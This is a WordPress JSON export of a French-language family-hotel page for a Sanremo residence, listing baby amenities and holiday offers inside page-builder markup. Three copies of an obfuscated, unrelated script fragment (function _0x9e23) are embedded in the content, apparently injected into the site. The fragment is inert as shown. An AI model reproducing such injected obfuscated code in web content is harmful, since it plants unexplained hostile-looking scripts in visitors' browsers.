{"id":2521,"date":"2018-10-10T09:43:15","date_gmt":"2018-10-10T07:43:15","guid":{"rendered":"http:\/\/www.dueportisanremo.it\/family-hotel.html"},"modified":"2021-09-16T17:04:31","modified_gmt":"2021-09-16T15:04:31","slug":"family-hotel","status":"publish","type":"page","link":"https:\/\/www.dueportisanremo.it\/fr\/family-hotel\/","title":{"rendered":"Family Hotel"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row full_height=&#8221;yes&#8221; max_row_content_width=&#8221;100%&#8221; row_content_width=&#8221;100%&#8221; css=&#8221;.vc_custom_1539157099374{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;background-image: url(http:\/\/www.dueportisanremo.it\/wp-content\/uploads\/familytop2.jpg?id=1831) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][vc_column][vc_empty_space height=&#8221;320px&#8221;][\/vc_column][\/vc_row][vc_row gap=&#8221;5&#8243; css=&#8221;.vc_custom_1537255278804{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 5px !important;padding-bottom: 5px !important;background-color: #f9f7f4 !important;}&#8221;][vc_column][vc_row_inner equal_height=&#8221;yes&#8221; gap=&#8221;10&#8243; css=&#8221;.vc_custom_1537255223250{margin-right: 17px !important;margin-left: 17px !important;}&#8221;][vc_column_inner offset=&#8221;vc_col-lg-6 vc_col-md-6 vc_col-xs-12&#8243; css=&#8221;.vc_custom_1537284871816{padding-top: 30px !important;padding-right: 30px !important;padding-bottom: 30px !important;padding-left: 30px !important;background-color: #ffffff !important;}&#8221;][vc_custom_heading text=&#8221;FAMILY HOTEL RESIDENCE DUE PORTI&#8221; font_container=&#8221;tag:h3|text_align:center&#8221; use_theme_fonts=&#8221;yes&#8221; css=&#8221;.vc_custom_1539156389022{margin-bottom: 10px !important;}&#8221;][vc_single_image image=&#8221;111&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; css=&#8221;.vc_custom_1537199701059{margin-bottom: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_custom_heading text=&#8221;D\u00e9couvrez tous les avantages et services pour vos vacances en famille \u00e0 Sanremo&#8221; font_container=&#8221;tag:h4|text_align:center&#8221; use_theme_fonts=&#8221;yes&#8221; css=&#8221;.vc_custom_1540024230590{margin-bottom: 10px !important;}&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><span title=\"\">S\u00e9jour gratuit pour les enfants jusqu&#8217;\u00e0 3 ans (dans certaines p\u00e9riodes de l&#8217;ann\u00e9e jusqu&#8217;\u00e0 12 ans)<\/span><\/p>\n<p style=\"text-align: center;\"><span title=\"\">Terrasse de jeux avec sol anti-traumatisme pour les enfants jusqu&#8217;\u00e0 6 ans<\/span><\/p>\n<p style=\"text-align: center;\"><span title=\"\">Lit b\u00e9b\u00e9 complet avec draps<\/span><\/p>\n<p style=\"text-align: center;\"><span title=\"\">bain<\/span><\/p>\n<p style=\"text-align: center;\"><span title=\"\">chaise haute<\/span><\/p>\n<p style=\"text-align: center;\"><span title=\"\">Chauffe-biberon<\/span><\/p>\n<p style=\"text-align: center;\"><span title=\"\">C\u00f4t\u00e9s du lit<\/span><\/p>\n<p style=\"text-align: center;\"><span title=\"\">poussettes<\/span><\/p>\n<p style=\"text-align: center;\"><span title=\"\">Tapis de jeux<\/span><\/p>\n<p style=\"text-align: center;\"><span class=\"\" title=\"\">V\u00e9los en libre utilisation avec des si\u00e8ges pour b\u00e9b\u00e9 (poids maximum 22 kg)<\/span><\/p>\n<p style=\"text-align: center;\"><span class=\"\" title=\"\">Convention avec des plages adapt\u00e9es aux b\u00e9b\u00e9s plac\u00e9es devant la r\u00e9sidence<\/span><\/p>\n<p style=\"text-align: center;\"><span class=\"\" title=\"\">Sur demande, nos p\u00e9diatres de confiance sont disponibles pour des visites payantes du lundi au vendredi (en cas de besoin et pendant les vacances, l&#8217;h\u00f4pital de Sanremo dispose d&#8217;un excellent service d&#8217;urgence p\u00e9diatrique).<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243; offset=&#8221;vc_col-lg-6 vc_col-md-6 vc_hidden-sm vc_hidden-xs&#8221; css=&#8221;.vc_custom_1539157145452{background-image: url(http:\/\/www.dueportisanremo.it\/wp-content\/uploads\/familytop.jpg?id=1836) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][vc_empty_space height=&#8221;320px&#8221;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row max_row_content_width=&#8221;100%&#8221; row_content_width=&#8221;100%&#8221;][vc_column]<div class=\"templatera_shortcode\">\r\n\r\n\r\n<div class=\"wow vc_row wpb_row vc_row-fluid sabbia vc_custom_1547718125441 vc_row-has-fill\" style=\"background-position: center top !important\"><div style=\"max-width:1200px; margin: 0 auto; width:100% \">    <div class=\"wow wpb_column vc_column_container vc_col-sm-12\"><div class=\"vc_column-inner \" style=\"background-position: center top!important\"><div class=\"wpb_wrapper\"><h2 style=\"text-align: center\" class=\"vc_custom_heading vc_do_custom_heading vc_custom_1539857331931\" >OFFRES<\/h2>\r\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center  vc_custom_1537199701059\">\r\n\t\t\r\n\t\t<figure class=\"wpb_wrapper vc_figure\">\r\n\t\t\t<div class=\"vc_single_image-wrapper   vc_box_border_grey\"><img loading=\"lazy\" decoding=\"async\" width=\"149\" height=\"26\" src=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/cap.png\" class=\"vc_single_image-img attachment-full\" alt=\"\" title=\"cap\" \/><\/div>\r\n\t\t<\/figure>\r\n\t<\/div>\r\n<div class=\"vc_empty_space\"   style=\"height: 20px\"><span class=\"vc_empty_space_inner\"><\/span><\/div><script>jQuery( document ).ready(function() {jQuery('.owl-rolenzocarousel69d59c1c46869').owlCarousel({loop:true,margin:20,nav:true,navText:[\"<i class=\\\"fa fa-arrow-left\\\" aria-hidden=\\\"true\\\"><\/i>\",\"<i class=\\\"fa fa-arrow-right\\\" aria-hidden=\\\"true\\\"><\/i>\"],dots:false,autoplay:true,autoplayTimeout:5000,autoplayHoverPause:true,responsive:{0:{items:1},768:{items:2},992:{items:2},1200:{items:2},1500:{items:3}}});});<\/script><style> .item-carousel-69d59c1c46869 .img_title {color:#ffffff}.item-carousel-69d59c1c46869 .img_intro {color:#ffffff}.item-carousel-69d59c1c46869 .img_prezzi {color:#ffffff}.item-carousel-69d59c1c46869 .img_link .dettaglioffer {padding:3px; border:1px solid #ffffff;color:#0c5dac; background:#ffffff}.item-carousel-69d59c1c46869 .img_link .bookinglink {padding:3px; border:1px solid #ffffff;color:#0c5dac; background:#ffffff}.item-carousel-69d59c1c46869 .didascalia_title {color:#777777!important}.item-carousel-69d59c1c46869 .didascalia_intro {color:#777777!important}.item-carousel-69d59c1c46869 .didascalia_prezzi {color:#777777!important}.item-carousel-69d59c1c46869 .didascalia_link .dettaglioffer {padding:3px; border:1px solid #ffffff;color:#ffffff!important; background:#0c5dac!important}.item-carousel-69d59c1c46869 .didascalia_link .bookinglink {padding:3px; border:1px solid #ffffff!important;color:#ffffff!important; background:#0c5dac!important}body .owl-rolenzocarousel69d59c1c46869 .owl-nav [class*=owl-]    {border:1px solid ;background: #0c5dac;color:#ffffff}body .owl-rolenzocarousel69d59c1c46869 .owl-nav [class*=owl-]:hover    {border:1px solid ;background: rgba(12,93,172,0.86);color:#ffffff}<\/style> <style> body .owl-rolenzocarousel69d59c1c46869 .owl-nav [class*=owl-]    {-webkit-border-radius: 20px!important;\n\t\t\t\t\t\t-moz-border-radius: 20px!important;\n\t\t\t\t\t\tborder-radius: 20px!important;}<\/style> <div class=><div class=\"owl-carousel owl-theme owl-rolenzocarousel69d59c1c46869\"><div class=\"item item-carousel-69d59c1c46869\" ><div class=\"grid\" style=\"background:#ffffff\">\n\t\t\t\t<div class=\"vc_row\">\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\t<div class=\"vc_col-lg-12 vc_col-md-12 vc_col-sm-12 vc_col-xs-12 figurehover\"><style>\n.imghvr-grad-radial-in:before {\n  background-image: -webkit-radial-gradient(transparent 0%, #0c5dac 100% );\n  background-image: radial-gradient(transparent 0%, #0c5dac  100% );\n}\n\n.imghvr-grad-radial-in:after {\n\n  background-color: #0c5dac;\n}\n\n \n\/* imghvr-grad-radial-out\n   ----------------------------- *\/\n.imghvr-grad-radial-out:before {\n  background-image: -webkit-radial-gradient(#0c5dac  0%, transparent 100%);\n  background-image: radial-gradient(#0c5dac  0%, transparent 100%);\n \n}\n\n \n\n\/* imghvr-grad-up\n   ----------------------------- *\/\n.imghvr-grad-up:before {\n  background-image: -webkit-linear-gradient( top , transparent 0%, #0c5dac100% );\n  background-image: linear-gradient(to bottom, transparent 0%, #0c5dac 100%);\n}\n\n\/* imghvr-grad-down\n   ----------------------------- *\/\n.imghvr-grad-down:before {\n \n  background-image: -webkit-linear-gradient( bottom , transparent 0%, #0c5dac 100%);\n  background-image: linear-gradient(to top, transparent 0%, #0c5dac100%);\n \n}\n\n\/* imghvr-grad-left\n   ----------------------------- *\/\n.imghvr-grad-left:before {\n \n  background-image: -webkit-linear-gradient( left , transparent 0%, #0c5dac 100%);\n  background-image: linear-gradient(to right, transparent 0%, #0c5dac 100%);\n \n}\n\n\/* imghvr-grad-right\n   ----------------------------- *\/\n.imghvr-grad-right:before {\n \n  background-image: -webkit-linear-gradient( right , transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(to left, transparent 0%, #0c5dac 100% );\n \n}\n\n\/* imghvr-grad-top-left\n   ----------------------------- *\/\n.imghvr-grad-top-left:before {\n  background-image: -webkit-linear-gradient(-45deg, transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(-45deg, transparent 0%, #0c5dac 100% );\n \n}\n\n \n\n\/* imghvr-grad-top-right\n   ----------------------------- *\/\n.imghvr-grad-top-right:before {\n  background-image: -webkit-linear-gradient(-315deg, transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(45deg, transparent 0%, #0c5dac 100% );\n \n}\n\n \n\n\/* imghvr-grad-bottom-left\n   ----------------------------- *\/\n.imghvr-grad-bottom-left:before {\n  background-image: -webkit-linear-gradient(-135deg, transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(-135deg, transparent 0%, #0c5dac 100% );\n \n}\n \n\n\/* imghvr-grad-bottom-right\n   ----------------------------- *\/\n.imghvr-grad-bottom-right:before {\n  background-image: -webkit-linear-gradient(-405deg, transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(135deg, transparent 0%, #0c5dac 100% );\n \n}\n \n<\/style>\n\n<figure style=\"background-color:#0c5dac\" class=\"  imghvr-hinge-up\">\n    <img loading=\"lazy\" decoding=\"async\" width=\"480\" height=\"360\" src=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/HAPPY-COUPLE-e1453420356702-480x360.jpg\" class=\"attachment-480x360 size-480x360 wp-post-image\" alt=\"\" \/>\n    <figcaption>\n\t\t<h3 class=\" img_title ih-fade-up ih-delay-xs\">  Last Minute Sanremo<\/h3>\n\t\t<p class=\"img_intro hide ih-delay-xs\">\n\t\tR\u00e9servez vos vacances maintenant\n\t\t<\/p><br \/><div class=\" img_link ih-fade-left ih-delay-xs\">\n\t\t\t<a class=\"dettaglioffer\" href=\"https:\/\/www.dueportisanremo.it\/fr\/offre\/last-minute\/\" target=\"_self\">Details<\/a> <a rel=\"nofollow\" class=\"bookinglink\" href=\"https:\/\/www.simplebooking.it\/ibe\/hotelbooking\/search?hid=856&lang=FR#\/offer&offerId=24967\" target=\"_blank\">R\u00e9servez-vous<\/a>\n\t\t\n\t\t<\/div> \n\t \n        \n    <\/figcaption>\n \n<\/figure>\n\n<\/div><div class=\"vc_col-lg-12 vc_col-md-12 vc_col-sm-12 vc_col-xs-12 didascaliahover\">\n\t\t\t\t\t\t \n\t\t\t\t\t\t <div class=\"didascalia\">\n\t\t\t\t \n\t\t\t<h3 class=\" didascalia_title show\">  Last Minute Sanremo<\/h3>\n\t\t<p class=\"didascalia_intro show \">\n\t\tR\u00e9servez vos vacances maintenant\n\t\t<\/p><p class=\"tipologia\"><strong><img loading=\"lazy\" decoding=\"async\" width=\"149\" height=\"26\" src=\"\/wp-content\/uploads\/cap.png\" class=\"vc_single_image-img attachment-full\" alt=\"\"><\/strong><\/p><br \/><div class=\" didascalia_link show \">\n\t\t\t<a class=\"dettaglioffer\" href=\"https:\/\/www.dueportisanremo.it\/fr\/offre\/last-minute\/\" target=\"_self\">Details<\/a> <a rel=\"nofollow\" class=\"bookinglink\" href=\"https:\/\/www.simplebooking.it\/ibe\/hotelbooking\/search?hid=856&lang=FR#\/offer&offerId=24967\" target=\"_blank\">R\u00e9servez-vous<\/a>\n\t\t\t\t\t\t <\/div> <br \/><\/div>\n\t\t\t\t\t\t <\/div><\/div><\/div><\/div><div class=\"item item-carousel-69d59c1c46869\" ><div class=\"grid\" style=\"background:#ffffff\">\n\t\t\t\t<div class=\"vc_row\">\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\t<div class=\"vc_col-lg-12 vc_col-md-12 vc_col-sm-12 vc_col-xs-12 figurehover\"><style>\n.imghvr-grad-radial-in:before {\n  background-image: -webkit-radial-gradient(transparent 0%, #0c5dac 100% );\n  background-image: radial-gradient(transparent 0%, #0c5dac  100% );\n}\n\n.imghvr-grad-radial-in:after {\n\n  background-color: #0c5dac;\n}\n\n \n\/* imghvr-grad-radial-out\n   ----------------------------- *\/\n.imghvr-grad-radial-out:before {\n  background-image: -webkit-radial-gradient(#0c5dac  0%, transparent 100%);\n  background-image: radial-gradient(#0c5dac  0%, transparent 100%);\n \n}\n\n \n\n\/* imghvr-grad-up\n   ----------------------------- *\/\n.imghvr-grad-up:before {\n  background-image: -webkit-linear-gradient( top , transparent 0%, #0c5dac100% );\n  background-image: linear-gradient(to bottom, transparent 0%, #0c5dac 100%);\n}\n\n\/* imghvr-grad-down\n   ----------------------------- *\/\n.imghvr-grad-down:before {\n \n  background-image: -webkit-linear-gradient( bottom , transparent 0%, #0c5dac 100%);\n  background-image: linear-gradient(to top, transparent 0%, #0c5dac100%);\n \n}\n\n\/* imghvr-grad-left\n   ----------------------------- *\/\n.imghvr-grad-left:before {\n \n  background-image: -webkit-linear-gradient( left , transparent 0%, #0c5dac 100%);\n  background-image: linear-gradient(to right, transparent 0%, #0c5dac 100%);\n \n}\n\n\/* imghvr-grad-right\n   ----------------------------- *\/\n.imghvr-grad-right:before {\n \n  background-image: -webkit-linear-gradient( right , transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(to left, transparent 0%, #0c5dac 100% );\n \n}\n\n\/* imghvr-grad-top-left\n   ----------------------------- *\/\n.imghvr-grad-top-left:before {\n  background-image: -webkit-linear-gradient(-45deg, transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(-45deg, transparent 0%, #0c5dac 100% );\n \n}\n\n \n\n\/* imghvr-grad-top-right\n   ----------------------------- *\/\n.imghvr-grad-top-right:before {\n  background-image: -webkit-linear-gradient(-315deg, transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(45deg, transparent 0%, #0c5dac 100% );\n \n}\n\n \n\n\/* imghvr-grad-bottom-left\n   ----------------------------- *\/\n.imghvr-grad-bottom-left:before {\n  background-image: -webkit-linear-gradient(-135deg, transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(-135deg, transparent 0%, #0c5dac 100% );\n \n}\n \n\n\/* imghvr-grad-bottom-right\n   ----------------------------- *\/\n.imghvr-grad-bottom-right:before {\n  background-image: -webkit-linear-gradient(-405deg, transparent 0%, #0c5dac 100% );\n  background-image: linear-gradient(135deg, transparent 0%, #0c5dac 100% );\n \n}\n \n<\/style>\n\n<figure style=\"background-color:#0c5dac\" class=\"  imghvr-hinge-up\">\n    <img loading=\"lazy\" decoding=\"async\" width=\"480\" height=\"360\" src=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/familytop2-480x360.jpg\" class=\"attachment-480x360 size-480x360 wp-post-image\" alt=\"\" \/>\n    <figcaption>\n\t\t<h3 class=\" img_title ih-fade-up ih-delay-xs\">  FAMILY OFFER<\/h3>\n\t\t<p class=\"img_intro hide ih-delay-xs\">\n\t\tR\u00e9servez vos vacances maintenant\n\t\t<\/p><br \/><div class=\" img_link ih-fade-left ih-delay-xs\">\n\t\t\t<a class=\"dettaglioffer\" href=\"https:\/\/www.dueportisanremo.it\/fr\/offre\/family\/\" target=\"_self\">Details<\/a> <a rel=\"nofollow\" class=\"bookinglink\" href=\"https:\/\/www.simplebooking.it\/ibe\/hotelbooking\/search?hid=856&lang=FR#\/offer&offerId=19312\" target=\"_blank\">R\u00e9servez-vous<\/a>\n\t\t\n\t\t<\/div> \n\t \n        \n    <\/figcaption>\n \n<\/figure>\n\n<\/div><div class=\"vc_col-lg-12 vc_col-md-12 vc_col-sm-12 vc_col-xs-12 didascaliahover\">\n\t\t\t\t\t\t \n\t\t\t\t\t\t <div class=\"didascalia\">\n\t\t\t\t \n\t\t\t<h3 class=\" didascalia_title show\">  FAMILY OFFER<\/h3>\n\t\t<p class=\"didascalia_intro show \">\n\t\tR\u00e9servez vos vacances maintenant\n\t\t<\/p><p class=\"tipologia\"><strong><img loading=\"lazy\" decoding=\"async\" width=\"149\" height=\"26\" src=\"\/wp-content\/uploads\/cap.png\" class=\"vc_single_image-img attachment-full\" alt=\"\"><\/strong><\/p><br \/><div class=\" didascalia_link show \">\n\t\t\t<a class=\"dettaglioffer\" href=\"https:\/\/www.dueportisanremo.it\/fr\/offre\/family\/\" target=\"_self\">Details<\/a> <a rel=\"nofollow\" class=\"bookinglink\" href=\"https:\/\/www.simplebooking.it\/ibe\/hotelbooking\/search?hid=856&lang=FR#\/offer&offerId=19312\" target=\"_blank\">R\u00e9servez-vous<\/a>\n\t\t\t\t\t\t <\/div> <br \/><\/div>\n\t\t\t\t\t\t <\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div>\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/div>[\/vc_column][\/vc_row][vc_row max_row_content_width=&#8221;100%&#8221; row_content_width=&#8221;100%&#8221;][vc_column]<div class=\"templatera_shortcode\">\r\n\r\n\r\n<div class=\"wow vc_row wpb_row vc_row-fluid vc_custom_1537280574436 vc_row-has-fill vc_row-o-equal-height vc_row-flex\" style=\"background-position: center top !important\"><div style=\"max-width:100%; margin: 0 auto; width:100% \"><div class=\"wow wpb_column vc_column_container vc_col-sm-12\"><div class=\"vc_column-inner \" style=\"background-position: center top!important\"><div class=\"wpb_wrapper\"><div class=\"vc_row wpb_row vc_inner vc_row-fluid vc_custom_1538994916261 vc_row-has-fill vc_row-o-equal-height vc_row-o-content-middle vc_row-flex\"><div class=\"wpb_column vc_column_container vc_col-sm-6\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\r\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center\">\r\n\t\t\r\n\t\t<figure class=\"wpb_wrapper vc_figure\">\r\n\t\t\t<div class=\"vc_single_image-wrapper   vc_box_border_grey\"><img loading=\"lazy\" decoding=\"async\" width=\"163\" height=\"192\" src=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/TC_2022_L_WHITE_BG_RGB.jpg\" class=\"vc_single_image-img attachment-full\" alt=\"\" title=\"TC_2022_L_WHITE_BG_RGB\" \/><\/div>\r\n\t\t<\/figure>\r\n\t<\/div>\r\n<\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-6\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\r\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center\">\r\n\t\t\r\n\t\t<figure class=\"wpb_wrapper vc_figure\">\r\n\t\t\t<div class=\"vc_single_image-wrapper   vc_box_border_grey\"><img loading=\"lazy\" decoding=\"async\" width=\"350\" height=\"119\" src=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/MkIW32741SLz-350-200-slimrank.png\" class=\"vc_single_image-img attachment-full\" alt=\"\" title=\"MkIW32741SLz-350-200-slimrank\" srcset=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/MkIW32741SLz-350-200-slimrank.png 350w, https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/MkIW32741SLz-350-200-slimrank-300x102.png 300w\" sizes=\"auto, (max-width: 350px) 85vw, 350px\" \/><\/div>\r\n\t\t<\/figure>\r\n\t<\/div>\r\n<\/div><\/div><\/div><\/div><div class=\"vc_row wpb_row vc_inner vc_row-fluid vc_row-o-equal-height vc_row-flex\"><div class=\"whitefont wpb_column vc_column_container vc_col-sm-6 vc_col-has-fill\"><div class=\"vc_column-inner vc_custom_1537279720566\"><div class=\"wpb_wrapper\"><h2 style=\"color: #ffffff;text-align: center\" class=\"vc_custom_heading vc_do_custom_heading vc_custom_1537279795586\" >TESTIMONIAL<\/h2>\r\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center  vc_custom_1537279395481\">\r\n\t\t\r\n\t\t<figure class=\"wpb_wrapper vc_figure\">\r\n\t\t\t<div class=\"vc_single_image-wrapper   vc_box_border_grey\"><img loading=\"lazy\" decoding=\"async\" width=\"149\" height=\"26\" src=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/wcap.png\" class=\"vc_single_image-img attachment-full\" alt=\"\" title=\"wcap\" \/><\/div>\r\n\t\t<\/figure>\r\n\t<\/div>\r\n<div class=\"vc_empty_space\"   style=\"height: 32px\"><span class=\"vc_empty_space_inner\"><\/span><\/div><\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-6\"><div class=\"vc_column-inner vc_custom_1537280523960\"><div class=\"wpb_wrapper\">\n\t<div class=\"wpb_raw_code wpb_raw_html wpb_content_element vc_custom_1541582101480\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<iframe loading=\"lazy\" src=\"https:\/\/www.google.com\/maps\/embed?pb=!1m14!1m8!1m3!1d184219.59200834561!2d7.74099381500814!3d43.82615799997776!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xd4788a2167106ca9!2sResidence+Dei+Due+Porti!5e0!3m2!1sit!2sit!4v1541582062596\" width=\"100%\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen><\/iframe>\n\t\t<\/div>\n\t<\/div>\n<\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div>\r\n\r\n\r\n<div class=\"wow vc_row wpb_row vc_row-fluid\" style=\"background-position: center top !important\"><div style=\"max-width:900px; margin: 0 auto; width:100% \"><div class=\"wow wpb_column vc_column_container vc_col-sm-12\"><div class=\"vc_column-inner \" style=\"background-position: center top!important\"><div class=\"wpb_wrapper\">\r\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center\">\r\n\t\t\r\n\t\t<figure class=\"wpb_wrapper vc_figure\">\r\n\t\t\t<div class=\"vc_single_image-wrapper   vc_box_border_grey\"><img loading=\"lazy\" decoding=\"async\" width=\"1100\" height=\"120\" src=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/partner.jpg\" class=\"vc_single_image-img attachment-full\" alt=\"\" title=\"partner\" srcset=\"https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/partner.jpg 1100w, https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/partner-300x33.jpg 300w, https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/partner-768x84.jpg 768w, https:\/\/www.dueportisanremo.it\/wp-content\/uploads\/partner-1024x112.jpg 1024w\" sizes=\"auto, (max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 1362px) 62vw, 840px\" \/><\/div>\r\n\t\t<\/figure>\r\n\t<\/div>\r\n<\/div><\/div><\/div><\/div><\/div>\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/div>[\/vc_column][\/vc_row]<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"FAMILY HOTEL RESIDENCE DUE PORTI D\u00e9couvrez tous les avantages et services pour vos vacances en famille \u00e0 Sanremo S\u00e9jour gratuit pour les enfants jusqu'\u00e0 3 ans (dans certaines p\u00e9riodes de l'ann\u00e9e jusqu'\u00e0 12 ans) Terrasse de jeux avec sol anti-traumatisme pour les enfants jusqu'\u00e0 6 ans Lit b\u00e9b\u00e9 complet avec draps bain chaise haute Chauffe-biberon &hellip; <a href=\"https:\/\/www.dueportisanremo.it\/fr\/family-hotel\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Family Hotel\"<\/span><\/a>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-2521","page","type-page","status-publish","hentry"],"acf":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.dueportisanremo.it\/fr\/wp-json\/wp\/v2\/pages\/2521","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dueportisanremo.it\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.dueportisanremo.it\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.dueportisanremo.it\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dueportisanremo.it\/fr\/wp-json\/wp\/v2\/comments?post=2521"}],"version-history":[{"count":5,"href":"https:\/\/www.dueportisanremo.it\/fr\/wp-json\/wp\/v2\/pages\/2521\/revisions"}],"predecessor-version":[{"id":4176,"href":"https:\/\/www.dueportisanremo.it\/fr\/wp-json\/wp\/v2\/pages\/2521\/revisions\/4176"}],"wp:attachment":[{"href":"https:\/\/www.dueportisanremo.it\/fr\/wp-json\/wp\/v2\/media?parent=2521"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}